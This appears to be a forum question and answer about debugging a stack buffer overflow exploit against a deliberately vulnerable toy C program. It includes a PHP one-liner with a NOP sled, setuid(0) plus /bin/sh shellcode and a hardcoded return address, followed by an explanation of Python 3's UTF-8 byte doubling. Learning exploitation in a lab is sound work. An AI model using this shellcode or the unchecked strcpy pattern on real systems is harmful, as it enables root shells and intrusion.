I have a C program to exploit a buffer overflow:
#include <stdlib.h>
#include <stdio.h>
#include <string.h>

/* Deliberately unsafe: strcpy() copies argv[1] into a 256-byte stack buffer
   with no length check, so a longer argument overwrites the saved frame. */
int overflow(char *input) {
    char buf[256];
    strcpy(buf, input);
    return 1;
}

int main(int argc, char *argv[]) {
    overflow(argv[1]);
    printf("meow =^..^=\n");
    return 1;
}
I try to fill my stack with 0x90 instructions. For that, I use the following command and inspect with GDB:
./vuln $(python -c 'print ("\x41" * (272 - 96 - 74 - 4) + "\x90" * 96 + "\x44" * 74 + "\x42" * 4)')
0xffffd1cc: 0x41 0x41 0x41 0x41 0x41 0xc2 0x90 0xc2
0xffffd1d4: 0x90 0xc2 0x90 0xc2 0x90 0xc2 0x90 0xc2
0xffffd1dc: 0x90 0xc2 0x90 0xc2 0x90 0xc2 0x90 0xc2
0xffffd1e4: 0x90 0xc2 0x90 0xc2 0x90 0xc2 0x90 0xc2
0xffffd1ec: 0x90 0xc2 0x90 0xc2 0x90 0xc2 0x90 0xc2
0xffffd1f4: 0x90 0xc2 0x90 0xc2 0x90 0xc2 0x90 0xc2
As you can see, the stack receives the 0xc2 instruction interspersed with 0x90 (the only one I requested). I believe this comes from some protection, but I'm not sure.
Is this protection? If so, is there any way to bypass it? If not, what would it be?
Thanks for all the help.
The problem was how Python handled hex; I found an alternative by switching to PHP. Here is the implemented code:
./vuln $(php -r 'echo str_repeat("\x41", 179). str_repeat("\x90", 56) . "\x31\xc0\x31\xdb\xb0\xd5\xcd\x80\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\xb0\x0b\xcd\x80" . "\xc0\xd3\xff\xff";')
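The 0xc2 bytes seen in the question's GDB dump are not a protection: they are UTF-8. Under Python 3, "\x90" is a str containing the code point U+0090, and print() encodes it through the text layer of stdout, so every code point in U+0080..U+00FF becomes two bytes (U+0090 -> c2 90); only "\x41" survives as a single byte because it is ASCII. Python 2's str was a byte string, which is why the same one-liner behaves differently there. The following added example (not from the question or the answer, and not the poster's code) reproduces that encoding step, parses the dump quoted above, recovers the byte pattern the author actually meant, and shows the binary-safe way to emit bytes from Python 3 (sys.stdout.buffer). The GDB_DUMP lines are copied from the question; the function names are my own.

```python
import codecs
import sys

# Sample input: the first two lines of the GDB memory dump quoted in the question.
GDB_DUMP = [
    "0xffffd1cc: 0x41 0x41 0x41 0x41 0x41 0xc2 0x90 0xc2",
    "0xffffd1d4: 0x90 0xc2 0x90 0xc2 0x90 0xc2 0x90 0xc2",
]


def print_would_emit(s: str, encoding: str = "utf-8") -> bytes:
    """Bytes that Python 3's print() writes for a str when stdout uses `encoding`.

    Code points above U+007F are multi-byte in UTF-8, so "\\x90" (U+0090)
    turns into b"\\xc2\\x90" on the way out. ASCII such as "\\x41" is unchanged.
    """
    return s.encode(encoding)


def parse_gdb_dump(lines) -> bytes:
    """Parse 'addr: 0xNN 0xNN ...' lines (x/bx style output) into raw bytes."""
    out = bytearray()
    for line in lines:
        _, _, rest = line.partition(":")
        out.extend(int(tok, 16) for tok in rest.split())
    return bytes(out)


def recover_intended_bytes(observed: bytes):
    """Undo the accidental UTF-8 step.

    Decode the observed bytes as UTF-8, then map each code point back to one
    byte via Latin-1 (valid because every intended value is <= 0xFF).
    Returns (recovered, leftover): `leftover` is an incomplete trailing
    sequence that the dump window cut off (here a lone 0xc2), which the
    incremental decoder buffers instead of raising on.
    """
    decoder = codecs.getincrementaldecoder("utf-8")()
    text = decoder.decode(observed, final=False)
    leftover = decoder.getstate()[0]
    return text.encode("latin-1"), leftover


def write_raw(data: bytes, stream=None) -> int:
    """Write bytes untouched by bypassing the text layer (no encoding step)."""
    stream = sys.stdout.buffer if stream is None else stream
    return stream.write(data)


if __name__ == "__main__":
    observed = parse_gdb_dump(GDB_DUMP)
    recovered, leftover = recover_intended_bytes(observed)
    sys.stderr.write(f"print() emits for '\\x90': {print_would_emit(chr(0x90)).hex()}\n")
    sys.stderr.write(f"observed : {observed.hex()}\n")
    sys.stderr.write(f"recovered: {recovered.hex()}  (leftover {leftover.hex()})\n")
    # Binary-safe output: exactly one 0x90 byte per requested NOP.
    write_raw(b"\x90" * 4)
```

The recovered bytes are the five 0x41s followed by single 0x90s, i.e. the pattern the original command asked for. The practical consequence for anyone building test inputs in Python 3 is that byte literals (b"\x90") and sys.stdout.buffer.write() must be used instead of str and print(), otherwise every byte from 0x80 upward is silently doubled and any length arithmetic done on the input is off.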